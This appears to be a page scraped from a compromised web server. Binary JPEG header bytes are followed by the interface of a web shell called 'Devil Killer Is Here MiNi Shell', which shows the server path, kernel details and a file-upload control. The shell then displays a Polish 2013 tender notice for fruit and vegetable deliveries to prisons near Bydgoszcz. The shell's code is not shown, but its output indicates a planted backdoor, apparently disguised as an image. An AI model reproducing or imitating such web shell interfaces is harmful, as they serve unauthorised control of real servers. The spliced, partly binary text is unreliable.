JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130304/33061-N-2013.html

<p class="kh_header"><b>Gdańsk: Dostawy warzyw i owoców 4/2013 BIGB O/POTULICE</b><br>
<b>Numer ogłoszenia: 33061 - 2013; data zamieszczenia: 04.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bałtycka Instytucja Gospodarki Budżetowej BALTICA , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 58 3231102, faks 58 3231101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bigb-baltica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: IGB.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy warzyw i owoców 4/2013 BIGB O/POTULICE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> III. Przedmiot zamówienia: Dostawy warzyw i owoców:

Lp.
Przedmiot zamówienia

WARZYWA
Grupa 1

ZK Potulice
Grupa 2

AŚ Bydgoszcz, ZK Koronowo,
ZK Bydgoszcz-Fordon,
AŚ Chojnice
Grupa 3

ZK Nr 1 Grudziądz, 
ZK Nr 2 Grudziądz
Grupa 4

AŚ Inowrocław,
AŚ Toruń, 
ZK Włocławek
1. 
Ziemniaki jadalne - o średniej wielkości, tzn. o przeciętnej średnicy ok. 6 cm, przeciętnej długości ok. 8 cm, jednego gatunku, niemieszane, dopuszczalne odmiany: Irga, Sante, Irys, Bryza, Satina, Lord, jednostka miary kilogram.
CPV: 03212100-6.
ilość szacunkowa: 1500 kg
ilość szacunkowa: 1200 kg
Nie dotyczy
Nie dotyczy
2. 
Marchew - bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3 cm do 4 cm i długości od 12 cm do 15 cm, jednostka miary kilogram.
CPV: 03221112-4
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
Nie dotyczy
Nie dotyczy
3. 
Kapusta czerwona - w główkach, o minimalnej wadze główki 2,5 kg, jednostka miary kilogram.
CPV: 03221410-3. 
ilość szacunkowa: 300 kg
ilość szacunkowa: 200 kg
Nie dotyczy
Nie dotyczy
4. 
Groch łuskany, połówki, jednostka miary kilogram.
CPV: 03221220-4. 
ilość szacunkowa: 200 kg
ilość szacunkowa: 200 kg
Nie dotyczy
Nie dotyczy
5. 
Fasola typu Jaś, duża, jednostka miary kilogram.
CPV: 03221210-1. 
ilość szacunkowa: 200 kg
ilość szacunkowa: 200 kg
Nie dotyczy
Nie dotyczy
6. 
Cebula - średniej wielkości, jednostka miary kilogram.
CPV: 03221112-1. 
ilość szacunkowa: 2000 kg
ilość szacunkowa: 1500 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 300 kg
7. 
Burak ćwikłowy - średniej wielkości, jednostka miary kilogram.
CPV: 03221111-7. 
ilość szacunkowa: 600 kg
ilość szacunkowa: 400 kg
Nie dotyczy
Nie dotyczy
8. 
Pietruszka korzeń - bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3 cm do 4 cm i długości od 12 cm do 15 cm, jednostka miary kilogram.
CPV: 03221100-7. 
ilość szacunkowa: 
100 kg
ilość szacunkowa: 
60 kg
Nie dotyczy
Nie dotyczy
9. 
Nać pietruszki - o przeciętnej wadze pęczka ok. 100 g i maksymalnej długości 15 cm jednostka miary kilogram.
CPV: 03221300-9.
ilość szacunkowa: 
50 kg
ilość szacunkowa: 
50 kg
Nie dotyczy
Nie dotyczy
10. 
Koper - o przeciętnej wadze pęczka ok. 100g i maksymalnej długości 15 cm, jednostka miary kilogram.
CPV: 03221300-9.
ilość szacunkowa: 
50 kg
ilość szacunkowa: 
50 kg
Nie dotyczy
Nie dotyczy
11. 
Ogórek zielony - twardy, średniej wielkości, w całości, polny, jednostka miary kilogram.
CPV: 03221270-9. 
ilość szacunkowa: 700 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
12. 
Papryka surowa - czerwona, cała, jednostka miary kilogram.
CPV: 03221230-7. 
ilość szacunkowa: 300 kg
ilość szacunkowa: 200 kg
ilość szacunkowa: 200 kg
ilość szacunkowa: 200 kg
13. 
Pieczarka - o średniej wielkości, tzn. zamknięte kapelusze o średnicy od 3cm do 5cm, jednostka miary kilogram.
CPV: 03221260-6. 
ilość szacunkowa: 500 kg
ilość szacunkowa: 300 kg
Nie dotyczy
Nie dotyczy
14. 
Pomidor - czerwony, cały, średniej wielkości, polny, jednostka miary kilogram.
CPV: 03221240-0. 
ilość szacunkowa: 500 kg
ilość szacunkowa: 600 kg
ilość szacunkowa: 600 kg
ilość szacunkowa: 600 kg
15. 
Por - oczyszczony, gruby, w całości, jednostka miary kilogram.
CPV: 03222230-4. 
ilość szacunkowa: 
100 kg
ilość szacunkowa: 
50 kg
Nie dotyczy
Nie dotyczy
16. 
Seler - duży, oczyszczony, bez liści, jednostka miary kilogram.
CPV: 03221100-7. 
ilość szacunkowa:
20 kg
ilość szacunkowa: 
20 kg
ilość szacunkowa: 
20 kg
ilość szacunkowa: 
20 kg
17. 
Kapusta włoska - w główkach, o wadze główki od 1,8 kg do 4,0 kg, jednostka miary kilogram.
CPV: 03221410-3. 
ilość szacunkowa: 100 kg
ilość szacunkowa: 100 kg
Nie dotyczy
Nie dotyczy
18. 
Kapusta biała - w główkach, o wadze główki od 2 kg do 4 kg, jednostka miary kilogram.
CPV: 03221410-3. 
ilość szacunkowa: 500 kg
ilość szacunkowa: 200 kg
Nie dotyczy
Nie dotyczy
19. 
Kapusta pekińska - w główkach, o minimalnej średnicy 10 cm i minimalnej długości 20 cm, jednostka miary kilogram.
CPV: 03221410-3. 
ilość szacunkowa: 400 kg
ilość szacunkowa: 300 kg
Nie dotyczy
Nie dotyczy
20. 
Cukinia - jednostka miary kg.
CPV: 03221310-2.
ilość szacunkowa:  200  kg
ilość szacunkowa:  200  kg
Nie dotyczy
Nie dotyczy
21. 
Sałata głowiasta kl. I, - jednostka miary szt.
CPV: 03221310-2.
ilość szacunkowa: 200 szt.
ilość szacunkowa: 200 szt.
ilość szacunkowa: 50 szt.
ilość szacunkowa: 50 szt.
22. 
Sałata lodowa główka  -  jednostka miary szt.
CPV: 03221310-2. 
ilość szacunkowa: 300 szt.
ilość szacunkowa: 300 szt.
Nie dotyczy
Nie dotyczy
23. 
Sałata karbowana czerwona główka,  jednostka miary szt.
CPV: 03221310-2. 
ilość szacunkowa: 150 szt.
ilość szacunkowa: 150 szt.
Nie dotyczy
Nie dotyczy
24. 
Kalafior, jednostka miary szt.
CPV: 03221420-6.
ilość szacunkowa: 500 szt.
ilość szacunkowa: 500 szt.
ilość szacunkowa: 
50 szt.
ilość szacunkowa: 
50 szt.
25. 
Brokuły, jednostka miary szt.
CPV: 03221430-9. 
ilość szacunkowa: 500 szt.
ilość szacunkowa: 500 szt.
ilość szacunkowa: 
50 szt.
ilość szacunkowa: 50 szt.
26. 
Pomidor koktajlowy tacka 500 g, jednostka miary szt.
CPV: 03221240-0. 
ilość szacunkowa: 150 szt.
ilość szacunkowa: 150 szt.
ilość szacunkowa: 150 szt.
ilość szacunkowa: 150 szt.
27. 
Rzodkiewka - jednostka miary szt.
CPV: 03221100-7. 
ilość szacunkowa: 500 szt.
ilość szacunkowa: 500 szt.
ilość szacunkowa: 500 szt.
ilość szacunkowa: 500 szt.
28. 
Mięta świeża doniczka, jednostka miary szt.
CPV: 03121100-6. 
ilość szacunkowa: 
50 szt.
ilość szacunkowa: 
30 szt.
Nie dotyczy
Nie dotyczy
29. 
Bazylia świeża doniczka,  jednostka miary szt.
CPV: 03121100-6.
ilość szacunkowa: 
50 szt.
ilość szacunkowa: 
30 szt.
Nie dotyczy
Nie dotyczy
30. 
Czosnek - w główkach, średniej wielkości, o przeciętnej wadze główki od 35 g do 50 g, jednostka miary kilogram.
CPV: 03221100-7.
ilość szacunkowa: 
50 kg
ilość szacunkowa:
50 kg
ilość szacunkowa: 
50 kg
ilość szacunkowa: 
50 kg
31. 
Kapusta kwaszona z marchewką - bez konserwantów, jednostka miary kilogram.
CPV: 03221410-3. 
ilość szacunkowa: 300 kg
ilość szacunkowa: 300 kg
Nie dotyczy
Nie dotyczy
32. 
Fasolka szparagowa (sezonowo),  jednostka miary kg.
CPV: 03221212-0. 
ilość szacunkowa: 200 kg
ilość szacunkowa: 200 kg
Nie dotyczy
Nie dotyczy
33. 
Wiśnie (sezonowo),  jednostka miary kg.
CPV: 03222333-6. 
ilość szacunkowa: 200 kg
ilość szacunkowa: 200 kg
ilość szacunkowa: 200 kg
ilość szacunkowa: 200 kg
34. 
Śliwki (sezonowo),    jednostka miary kg.
CPV: 03222334-3. 
ilość szacunkowa: 300 kg
ilość szacunkowa: 300 kg
ilość szacunkowa: 300 kg
ilość szacunkowa: 300 kg
35. 
Brzoskwinia (sezonowo),  jednostka miary kg.
CPV: 03222332-9. 
ilość szacunkowa: 300 kg
ilość szacunkowa: 300 kg
ilość szacunkowa: 300 kg
ilość szacunkowa: 300 kg
36. 
Truskawki (sezonowo) , pakowane w łubianki do 3 kg , jednostka miary kg.
CPV: 03222313-0.
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg









Lp.
Przedmiot zamówienia

OWOCE
Grupa 5

ZK Potulice
Grupa 6

AŚ Bydgoszcz, ZK Koronowo,
ZK Bydgoszcz-Fordon,
AŚ Chojnice
Grupa 7

ZK Nr 1 Grudziądz, 
ZK Nr 2 Grudziądz
Grupa 8

AŚ Inowrocław,
AŚ Toruń, 
ZK Włocławek
1. 
Banan - jednostka miary kg.
CPV: 03222111-4. 
ilość szacunkowa: 800 kg
ilość szacunkowa: 800 kg
ilość szacunkowa: 800 kg
ilość szacunkowa: 800 kg
2. 
Grejpfrut - jednostka miary kg.
CPV: 03222230-4. 
ilość szacunkowa: 400 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
3. 
Winogrono zielone - jednostka miary kg.
CPV: 032222340-8. 
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
4. 
Winogrono fioletowe - jednostka miary kg.
CPV: 032222340-8. 
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
5. 
Gruszki - jednostka miary kg.
CPV: 03222322-6. 
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
6. 
Kiwi - jednostka miary kg.
CPV: 03222118-3. 
ilość szacunkowa: 
150 kg
ilość szacunkowa: 
250 kg
ilość szacunkowa: 
250 kg
ilość szacunkowa: 
150 kg
7. 
Pomarańcze - jednostka miary kg.
CPV: 03222200-1.
ilość szacunkowa: 2000 kg
ilość szacunkowa: 2000 kg
ilość szacunkowa: 1000 kg
ilość szacunkowa: 1000 kg
8. 
Mandarynki - jednostka miary kg. 
CPV: 03222240-7. 
ilość szacunkowa: 3000 kg
ilość szacunkowa: 3000 kg
ilość szacunkowa: 3000 kg
ilość szacunkowa: 3000 kg
9. 
Cytryny, jednostka miary kilogram.
CPV: 03222210-8. 
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
10. 
Jabłka - całe, średniej wielkości, jednostka miary kilogram.
CPV: 03222321-9. 
ilość szacunkowa: 2000 kg
ilość szacunkowa: 2000 kg
ilość szacunkowa: 2000 kg
ilość szacunkowa: 2000 kg

1. Zamówienie zostało podzielone na 8 grup (części):
1) Grupa 1 i 5 - dostawy do Zakładu Karnego w Potulicach, ul. Aleja Parkowa 1.
2) Grupa 2 i 6 - dostawy do: 
a) Aresztu Śledczego w Bydgoszczy, ul. Wały Jagiellońskie 4;
b) Zakładu Karnego w Bydgoszczy-Fordonie, ul. Rynek 8;
c) Zakładu Karnego w Koronowie, ul. Bydgoska 27;
d) Aresztu Śledczego w Chojnicach, ul. Pietruszkowa 4.
3) Grupa 3 i 7 - dostawy do: 
a) Zakładu Karnego Nr 1 w Grudziądzu, ul. Wybickiego 10/22;
b) Zakładu Karnego Nr 2 w Grudziądzu, ul. Sikorskiego 13/17.
4) Grupa 4 i 8 - dostawy do: 
a) Aresztu Śledczego w Inowrocławiu, ul. Gabriela Narutowicza 46;
b) Aresztu Śledczego w Toruniu, ul. Piekary 53;
c) Zakładu Karnego we Włocławku, ul. Bartnicka 10.
2. Ilości szacunkowe dostarczanych artykułów mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów będzie wynikała z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy.
3. Dostarczane warzywa i owoce mają być dojrzałe, świeże, czyste, bez oznak: zepsucia, zgnilizny oraz choroby.
4. Miejsce, sposób, terminy dostaw oraz forma i termin płatności.
1) Wykonawca dostarczać będzie ww. artykuły na swój koszt, w sposób zapobiegający utracie walorów użytkowych do magazynów Zamawiającego zlokalizowanych na terenie:
a) Zakładu Karnego w Potulicach, ul. Aleja Parkowa 1 - (grupa 1 i 5);
b) Aresztu Śledczego w Bydgoszczy, ul. Wały Jagiellońskie 4 - (grupa 2 i 6);
c) Zakładu Karnego w Bydgoszczy-Fordonie, ul. Rynek 8 - (grupa 2 i 6);
d) Zakładu Karnego w Koronowie, ul. Bydgoska 27 - (grupa 2 i 6);
e) Aresztu Śledczego w Chojnicach, ul. Pietruszkowa 4 - (grupa 2 i 6);
f) Zakładu Karnego Nr 1 w Grudziądzu, ul. Wybickiego 10/22 - (grupa 3 i 7);
g) Zakładu Karnego Nr 2 w Grudziądzu, ul. Sikorskiego 13/17 - (grupa 3 i 7);
h) Aresztu Śledczego w Inowrocławiu, ul. Gabriela Narutowicza 46 - (grupa 4 i 8);
i) Aresztu Śledczego w Toruniu, ul. Piekary 53 - (grupa 4 i 8);
j) Zakładu Karnego we Włocławku, ul. Bartnicka 10 - (grupa 4 i 8).
2) Realizacja dostaw do magazynu w uzgodnionych terminach, w godz. 8:00-12:00.
3) Termin płatności: 30 dni, forma płatności: przelew..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 03.22.11.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ust. 1 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ust. 1 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ust. 1 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ust. 1 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2) posiadania wiedzy i doświadczenia
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ust. 1 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.

IX.	Oświadczenia i dokumenty, jakie wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu.
1. W celu wykazania spełniania przez wykonawców warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, tj. warunków określonych w niniejszej siwz w rozdziale VIII pkt 1, których opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu oraz w niniejszej siwz - rozdział VIII pkt 3, wykonawca składa do oferty następujące dokumenty:
1)	podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do siwz).
2. W celu wykazania braku podstaw do wykluczenia wykonawców z postępowania o udzielenie zamówienia, o których mowa w art. 24 ust. 1 ustawy Pzp, tj. warunków określonych w niniejszej siwz w rozdziale VIII pkt 2, których opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu oraz w niniejszej siwz - rozdział VIII pkt 3, wykonawca składa do oferty następujące dokumenty:
1) podpisane oświadczenie o braku podstaw do wykluczenia (załącznik nr 3 do siwz);
2) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Wyjaśnienia:
1) Wykonawcy wspólnie ubiegających się o zamówienie (np. konsorcjum, spółka cywilna) do oferty dołączają:
a) pełnomocnictwo, o którym mowa w art. 23 ust. 2 ustawy Pzp, które zawiera m.in.: nazwy i adresy członków np. konsorcjum lub spółki cywilnej, nazwę i adres pełnomocnika, zakres pełnomocnictwa, datę udzielenia pełnomocnictwa oraz podpisy przedstawicieli członków np. konsorcjum, spółki cywilnej - zgodnie z zasadami reprezentacji;
b) oświadczenie wyszczególnione w pkt 1 ppkt 1) podpisane przez pełnomocnika lub wszystkich uprawnionych przedstawicieli członków np. konsorcjum, spółki cywilnej - zgodnie z zasadami reprezentacji;
c) dokumenty wyszczególnione w pkt 2 ppkt 1) i ppkt 2) złożone przez poszczególnych (wszystkich) wykonawców tworzących np. konsorcjum, spółkę cywilną.
2) Wszystkie dokumenty i oświadczenia wymienione w rozdziale IX w pkt 1 i w pkt 2 mają być złożone w formie oryginału lub kserokopii. Jeżeli wykonawca przedłoży kserokopię dokumentu to potwierdza go i podpisuje na każdej stronie przez osobę(y) uprawnioną do podpisania oferty, z dopiskiem za zgodność z oryginałem.
3) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w rozdziale IX w pkt 2 ppkt 2) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsca zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Niniejszy dokument, powinny być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4) Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w rozdziale IX pkt 3 ppkt 3) (powyżej), zastępuje się go dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Niniejszy dokument, powinny być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5) Dokumenty sporządzone w języku obcym składane są do oferty wraz z tłumaczeniem na język polski.
6) W przypadku wątpliwości interpretacyjnych dotyczących rodzajów dokumentów oraz formy ich składania w niniejszym postępowaniu, rozstrzygającym jest Rozporządzenie Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r. Poz. 231).</p>
</li></ul></li></ul>
